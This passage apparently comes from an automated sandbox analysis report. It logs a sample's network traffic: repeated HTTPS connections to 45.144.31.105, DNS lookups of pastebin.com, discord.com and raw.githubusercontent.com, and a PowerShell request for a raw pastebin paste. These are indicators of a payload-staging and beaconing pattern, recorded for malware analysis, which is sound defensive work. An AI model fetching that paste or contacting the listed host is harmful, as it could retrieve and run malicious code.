                                                                                    Oct 15, 2024 15:54:38.580841064 CEST49728443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.603404045 CEST49728443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.603416920 CEST4434972845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.603461027 CEST4434972845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.730664015 CEST49729443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.730791092 CEST4434972945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.730882883 CEST49729443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.754050016 CEST49729443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.754069090 CEST4434972945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.754105091 CEST4434972945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.868655920 CEST49731443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.868701935 CEST4434973145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.868810892 CEST49731443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.885148048 CEST49731443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:38.885164976 CEST4434973145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:38.885214090 CEST4434973145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.012891054 CEST49732443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.012923002 CEST4434973245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.013005972 CEST49732443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.042382002 CEST49732443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.042418003 CEST4434973245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.042479038 CEST4434973245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.166291952 CEST49733443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.166321039 CEST4434973345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.166474104 CEST49733443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.181129932 CEST49733443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:39.181153059 CEST4434973345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:39.181197882 CEST4434973345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:43.877476931 CEST49734443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:43.877532959 CEST4434973445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:43.877610922 CEST49734443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:43.903325081 CEST49734443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:43.903342962 CEST4434973445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:43.903399944 CEST4434973445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.029356003 CEST49735443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.029386997 CEST4434973545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.029539108 CEST49735443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.047744989 CEST49735443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.047760010 CEST4434973545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.047796965 CEST4434973545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.169687033 CEST49736443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.169732094 CEST4434973645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.169840097 CEST49736443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.188872099 CEST49736443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.188896894 CEST4434973645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.188961983 CEST4434973645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.309489012 CEST49737443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.309526920 CEST4434973745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.309596062 CEST49737443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.330033064 CEST49737443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.330059052 CEST4434973745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.330131054 CEST4434973745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.449299097 CEST49738443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.449345112 CEST4434973845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.449438095 CEST49738443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.467808962 CEST49738443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.467830896 CEST4434973845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.467878103 CEST4434973845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.588710070 CEST49739443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.588758945 CEST4434973945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.588860989 CEST49739443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.604211092 CEST49739443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.604227066 CEST4434973945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.604268074 CEST4434973945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.727981091 CEST49740443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.728029966 CEST4434974045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.728125095 CEST49740443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.743446112 CEST49740443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:44.743463993 CEST4434974045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:44.743488073 CEST4434974045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:48.589461088 CEST49741443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:48.589495897 CEST4434974145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:48.589616060 CEST49741443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:48.606522083 CEST49741443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:48.606539965 CEST4434974145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:48.606595039 CEST4434974145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:52.401650906 CEST49742443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:52.401700020 CEST4434974245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:52.401794910 CEST49742443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:52.416898966 CEST49742443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:52.416917086 CEST4434974245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:52.416965008 CEST4434974245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.762814045 CEST49743443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.762871027 CEST4434974345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.763008118 CEST49743443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.779922009 CEST49743443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.779968977 CEST4434974345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.780009985 CEST4434974345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.903928041 CEST49744443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.903965950 CEST4434974445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.904055119 CEST49744443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.919531107 CEST49744443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:55.919540882 CEST4434974445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:55.919586897 CEST4434974445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.041770935 CEST49745443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.041801929 CEST4434974545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.041888952 CEST49745443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.061023951 CEST49745443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.061043024 CEST4434974545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.061083078 CEST4434974545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.182636976 CEST49746443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.182677984 CEST4434974645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.182811022 CEST49746443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.197830915 CEST49746443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.197858095 CEST4434974645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.197896004 CEST4434974645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.323678970 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.323726892 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.323798895 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.340085983 CEST49747443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:54:56.340110064 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:54:56.340142965 CEST4434974745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.367953062 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.368026018 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.368117094 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.383234978 CEST49748443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.383265972 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.383331060 CEST4434974845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.493709087 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.493740082 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.493829966 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.509331942 CEST49749443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:00.509351015 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:00.509401083 CEST4434974945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.933973074 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.934016943 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.934092045 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.953305960 CEST49750443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:03.953342915 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:03.953419924 CEST4434975045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.698755980 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.698869944 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.698947906 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.716434956 CEST49751443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:07.716450930 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:07.716511965 CEST4434975145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.551069021 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.551105022 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.551177025 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.753562927 CEST49752443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.753586054 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.753654957 CEST4434975245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.855933905 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.855971098 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.856040955 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.885205030 CEST49753443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:10.885221958 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:10.885291100 CEST4434975345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.363965034 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.364017010 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.364144087 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.383949041 CEST49754443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.383994102 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.384102106 CEST4434975445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.462805033 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.462846041 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.463073015 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.478976011 CEST49755443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.478992939 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.479079008 CEST4434975545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.573898077 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.573935986 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.574067116 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.590547085 CEST49756443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:14.590569973 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:14.590701103 CEST4434975645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.916441917 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.916482925 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.916547060 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.933551073 CEST49757443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:17.933576107 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:17.933610916 CEST4434975745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.697297096 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.697350979 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.697408915 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.715661049 CEST49758443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.715682030 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.715728045 CEST4434975845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.776952982 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.777002096 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.777077913 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.795645952 CEST49759443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:20.795666933 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:20.795778990 CEST4434975945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.300882101 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.300925016 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.301078081 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.325185061 CEST49760443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.325200081 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.325261116 CEST4434976045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.385668039 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.385710955 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.385770082 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.406167984 CEST49761443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.406183004 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.406212091 CEST4434976145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.463968992 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.463994980 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.464051008 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.483233929 CEST49762443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.483243942 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.483268976 CEST4434976245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.541465998 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.541508913 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.541615963 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.557761908 CEST49763443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.557777882 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.557826996 CEST4434976345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.622113943 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.622159004 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.622215986 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.642785072 CEST49764443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.642796993 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.642833948 CEST4434976445.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.700881958 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.700939894 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.700993061 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.720679045 CEST49765443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:22.720701933 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:22.720741987 CEST4434976545.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:24.706754923 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:24.706809998 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:24.706877947 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:25.034327984 CEST49766443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:25.034354925 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:25.034421921 CEST4434976645.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.775739908 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.775789976 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.775971889 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.791914940 CEST49767443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.791929960 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.791990042 CEST4434976745.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.838218927 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.838269949 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.838471889 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.854386091 CEST49768443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.854435921 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.854506016 CEST4434976845.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.900142908 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.900181055 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.900361061 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.917256117 CEST49769443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.917284012 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.917366028 CEST4434976945.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.965270996 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.965308905 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.965467930 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.983139992 CEST49770443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:26.983156919 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:26.983208895 CEST4434977045.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.033865929 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.033926010 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.034086943 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.058046103 CEST49771443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.058079004 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.058136940 CEST4434977145.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.108529091 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.108577967 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.108818054 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.133655071 CEST49772443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.133671999 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.133737087 CEST4434977245.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.185498953 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.185551882 CEST4434977345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.185677052 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.212757111 CEST49773443192.168.2.945.144.31.105
                                                                                    Oct 15, 2024 15:55:27.212780952 CEST4434977345.144.31.105192.168.2.9
                                                                                    Oct 15, 2024 15:55:27.212842941 CEST4434977345.144.31.105192.168.2.9

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 15, 2024 15:54:01.693068027 CEST5662753192.168.2.91.1.1.1
                                                                                    Oct 15, 2024 15:54:01.700234890 CEST53566271.1.1.1192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.076685905 CEST6462853192.168.2.91.1.1.1
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST53646281.1.1.1192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.220020056 CEST6184053192.168.2.91.1.1.1
                                                                                    Oct 15, 2024 15:54:03.227500916 CEST53618401.1.1.1192.168.2.9
                                                                                    Oct 15, 2024 15:54:32.300494909 CEST5486753192.168.2.91.1.1.1
                                                                                    Oct 15, 2024 15:54:32.331110954 CEST53548671.1.1.1192.168.2.9

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 15, 2024 15:54:01.693068027 CEST192.168.2.91.1.1.10xb229Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.076685905 CEST192.168.2.91.1.1.10x2231Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.220020056 CEST192.168.2.91.1.1.10xf985Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:32.300494909 CEST192.168.2.91.1.1.10xf8c8Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 15, 2024 15:54:01.700234890 CEST1.1.1.1192.168.2.90xb229No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:01.700234890 CEST1.1.1.1192.168.2.90xb229No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:01.700234890 CEST1.1.1.1192.168.2.90xb229No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST1.1.1.1192.168.2.90x2231No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST1.1.1.1192.168.2.90x2231No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST1.1.1.1192.168.2.90x2231No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST1.1.1.1192.168.2.90x2231No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.085159063 CEST1.1.1.1192.168.2.90x2231No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.227500916 CEST1.1.1.1192.168.2.90xf985No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.227500916 CEST1.1.1.1192.168.2.90xf985No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.227500916 CEST1.1.1.1192.168.2.90xf985No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:03.227500916 CEST1.1.1.1192.168.2.90xf985No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:32.331110954 CEST1.1.1.1192.168.2.90xf8c8No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:32.331110954 CEST1.1.1.1192.168.2.90xf8c8No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 15:54:32.331110954 CEST1.1.1.1192.168.2.90xf8c8No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • pastebin.com
                                                                                    • discord.com
                                                                                    • raw.githubusercontent.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949710172.67.19.24804860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 15:54:01.722667933 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 15:54:02.324925900 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Tue, 15 Oct 2024 13:54:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: keep-alive
